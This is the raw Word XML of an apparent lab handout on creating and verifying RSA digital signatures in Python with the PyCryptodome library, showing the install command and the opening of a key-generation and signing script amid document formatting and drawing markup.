                <v:shape id="Graphic 39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M2wwAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Pi8Iw&#10;FMTvgt8hPGFvmuqCq9Uosiru0X/g9dk822rz0m2iVj/9RljwOMzMb5jxtDaFuFHlcssKup0IBHFi&#10;dc6pgv1u2R6AcB5ZY2GZFDzIwXTSbIwx1vbOG7ptfSoChF2MCjLvy1hKl2Rk0HVsSRy8k60M+iCr&#10;VOoK7wFuCtmLor40mHNYyLCk74ySy/ZqFBz3ev67Hva+dPo4HRar85OO9FTqo1XPRiA81f4d/m//&#10;aAWfQ3h9CT9ATv4AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEA9VqTNsMAAADbAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m6172200,l,,,19672r6172200,l6172200,xe" fillcolor="#9f9f9f" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 40" o:spid="_x0000_s1028" style="position:absolute;left:61704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b4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AjrW+MAAAADbAAAADwAAAAAA&#10;AAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPQCAAAAAA==&#10;" path="m3047,l,,,3047r3047,l3047,xe" fillcolor="#e2e2e2" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 41" o:spid="_x0000_s1029" style="position:absolute;left:3;top:2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844xAAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BawIx&#10;FITvhf6H8AreNGuVVrdG0YKgB1uqstDbY/O6Wbp5WZKo6783BaHHYWa+YWaLzjbiTD7UjhUMBxkI&#10;4tLpmisFx8O6PwERIrLGxjEpuFKAxfzxYYa5dhf+ovM+ViJBOOSowMTY5lKG0pDFMHAtcfJ+nLcY&#10;k/SV1B4vCW4b+ZxlL9JizWnBYEvvhsrf/ckqKLw3y8+P3Yq2o/a7fs2K6SoUSvWeuuUbiEhd/A/f&#10;2xutYDyEvy/pB8j5DQAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAIO/zjjEAAAA2w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42" o:spid="_x0000_s1030" style="position:absolute;left:61704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gtwwAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvgv9heQUvopuKlJK6CcVS8BACNcXzI/uaDWbfht2txn/vCoUeh5n5htmVkx3EhXzoHSt4Xmcg&#10;iFune+4UfDefq1cQISJrHByTghsFKIv5bIe5dlf+ossxdiJBOOSowMQ45lKG1pDFsHYjcfJ+nLcY&#10;k/Sd1B6vCW4HucmyF2mx57RgcKS9ofZ8/LUKllxXtembs/1oTk3mq1APslJq8TS9v4GINMX/8F/7&#10;oBVsN/D4kn6ALO4AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAXLD4LcMAAADbAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m3047,l,,,13716r3047,l3047,xe" fillcolor="#e2e2e2" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 43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GG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e4X/L/EHyNUfAAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAPIFwYbEAAAA2wAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m3047,l,,,3048r3047,l3047,xe" fillcolor="#9f9f9f" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 44" o:spid="_x0000_s1032" style="position:absolute;left:3;top:170;width:61734;height:31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AExQAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvBf/D8oReSt1Ugi3RVYolUOhFraUeH9lnEsy+XbIbk/z7bkHwOMzMN8xqM5hGXKn1tWUFL7ME&#10;BHFhdc2lguN3/vwGwgdkjY1lUjCSh8168rDCTNue93Q9hFJECPsMFVQhuExKX1Rk0M+sI47e2bYG&#10;Q5RtKXWLfYSbRs6TZCEN1hwXKnS0rai4HDoTKQu3rc38x3XHXbr7HfOvp4/Tq1KP0+F9CSLQEO7h&#10;W/tTK0hT+P8Sf4Bc/wEAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQDDQpAExQAAANsAAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA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E06C4A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A72FB9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790"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/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signatures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PyCryptodome </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>library.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DE81B5" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B22CAC2" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="279" w:lineRule="exact"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr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verifies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signatures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pacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>PyCryptodome</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C92B54" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="271" w:lineRule="exact"/>
        <w:ind w:left="360"/>
      </w:pP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Python.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608FE77E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BB0AC89" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2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13D7BC7E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5666F48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46BEE4A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PyCryptodome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library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(Python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package)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2457F60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5D8625F6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7E6B29C7" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="19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FE65E9C" wp14:editId="03C86B74">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>297192</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6173470" cy="2095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1704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76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52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D54AA" id="Group 45" o:spid="_x0000_s1026" style="position:absolute;margin-left:1in;margin-top:23.4pt;width:486.1pt;height:1.65pt;z-index:-15724544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&#10;LnhtbFBLBQYAAAAABAAEAPMAAADABwAAAAA=&#10;">
                <v:shape id="Graphic 46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3Q5wwAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Pi8Iw&#10;FMTvwn6H8Ba8abqyqFuNIrqiR//BXp/Ns63bvNQmavXTG0HwOMzMb5jhuDaFuFDlcssKvtoRCOLE&#10;6pxTBbvtvNUH4TyyxsIyKbiRg/HoozHEWNsrr+my8akIEHYxKsi8L2MpXZKRQde2JXHwDrYy6IOs&#10;UqkrvAa4KWQnirrSYM5hIcOSphkl/5uzUbDf6dlp9dPp6fR2+PtdHO+0p7tSzc96MgDhqfbv8Ku9&#10;1Aq+u/D8En6AHD0AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEA3MN0OcMAAADbAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m6172200,l,,,19685r6172200,l6172200,xe" fillcolor="#9f9f9f" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 47" o:spid="_x0000_s1028" style="position:absolute;left:61704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06M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I3TTozEAAAA2wAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m3047,l,,,3048r3047,l3047,xe" fillcolor="#e2e2e2" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 48" o:spid="_x0000_s1029" style="position:absolute;left:3;top:7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elwgAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/LagIx&#10;FN0X+g/hFtxpplWqTo2igqCLtvhgoLvL5HYydHIzJFHHvzcLocvDec8WnW3EhXyoHSt4HWQgiEun&#10;a64UnI6b/gREiMgaG8ek4EYBFvPnpxnm2l15T5dDrEQK4ZCjAhNjm0sZSkMWw8C1xIn7dd5iTNBX&#10;Unu8pnDbyLcse5cWa04NBltaGyr/DmeroPDeLL+/Ple0G7Y/9TgrpqtQKNV76ZYfICJ18V/8cG+1&#10;glEam76kHyDndwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQAShWelwgAAANsAAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;" path="m3048,3048l,3048,,16764r3048,l3048,3048xem6173152,r-3035,l6170117,3048r3035,l6173152,xe" fillcolor="#9f9f9f" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 49" o:spid="_x0000_s1030" style="position:absolute;left:61704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pcwwAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BawIx&#10;FITvhf6H8ApeSs0qUu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UhRqXMMAAADbAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m3047,l,,,13716r3047,l3047,xe" fillcolor="#e2e2e2" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 50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ks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u&#10;j1/iD5CrfwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAAAAAA&#10;AAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAAAAAA&#10;AAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCHDsksvwAAANsAAAAPAAAAAAAA&#10;AAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA8wIAAAAA&#10;" path="m3047,l,,,3048r3047,l3047,xe" fillcolor="#9f9f9f" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 51" o:spid="_x0000_s1032" style="position:absolute;left:3;top:175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VBxAAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Bi8Iw&#10;FITvwv6H8Ba8iKaKutI1yuIiCF7UVdzjo3m2xeYlNFHrvzeC4HGYmW+Y6bwxlbhS7UvLCvq9BARx&#10;ZnXJuYL937I7AeEDssbKMim4k4f57KM1xVTbG2/pugu5iBD2KSooQnCplD4ryKDvWUccvZOtDYYo&#10;61zqGm8Rbio5SJKxNFhyXCjQ0aKg7Ly7mEgZu0VpBgd32W+Gm+N9ue78/n8p1f5sfr5BBGrCO/xq&#10;r7SCUR+eX+IPkLMHAAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAFbspUHEAAAA2wAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=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2EA835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48F7EF44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6AA2E0D6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Digital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Signatures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0598697B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="52"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43135133" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>digital</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w: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cryptographic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 ensure that the message has not been tampered with. It uses a pair of keys:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571EF03C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58F31E6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  <w:b/>
        </w:rPr>
        <w:t>Private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key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>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digital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signature.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E2A293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  <w:b/>
        </w:rPr>
        <w:t>Public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key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>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verify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signature.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E83A19D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4ADBF76D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="360" w:right="426"/>
      </w:pPr>
      <w:r>
        <w:t>The signature is created by hashing the message and encrypting the hash with the sender's private key.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decrypt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sender‟s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 of the received message to verify its authenticity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AFF706" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="12"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40A486A2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Installing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PyCryptodome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  <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Library</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CDCC99" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="68"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C2EB198" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1" w:line="232" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="783"/>
      </w:pPr>
      <w:r>
        <w:t>First,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7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sz w:val="20"/>
        </w:rPr>
        <w:t>PyCryptodome</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-59"/>
          <w:sz w:val="20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if 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already.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Open your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command prompt and run the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165FEDEA" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="16"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7936DE61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pycryptodome</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FE2E2B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="197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Script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for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Digital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Signatures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3DF612" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="52"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1615F133" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="36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62D2F124" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5179D415" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32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Generates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(private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keys).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CA19F2" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1078"/>
        </w:tabs>
        <w:spacing w:before="1"/>
        <w:ind w:left="1078" w:hanging="358"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
        </w:rPr>
        <w:t>Creates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digital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signature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private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key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69523D77" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32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Verifies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digital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signature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key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130CF54B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="12"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="732B09C5" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1"/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(digital_signature.py):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5522CE5D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="43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Crypto.PublicKey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5"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>RSA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3353B31B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="360" w:right="5229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Crypto.Signature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pkcs1_15 from Crypto.Hash import SHA256</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0AED2C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="360" w:right="4861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Crypto.Random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get_random_bytes import binascii</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17398D13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E5CE73" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="83"/>
        <w:ind w:left="360" w:right="572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RSA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pair def generate_keys():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2DBC43" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="840" w:right="3449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RSA.generate(2048)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2048-bit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RSA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key private_key = key.export_key()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719C2FCD" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="840" w:right="4540"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>public_key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key.publickey().export_key() return private_key, public_key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE2C708" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="226"/>
        <w:ind w:left="360" w:right="4919"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t># Function to create a digital signature def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create_signature(message,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private_key):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FA459E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="840" w:right="572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SHA-256 h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2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>SHA256.new(message.encode())</w:t>
      </w:r>
    </w:p>
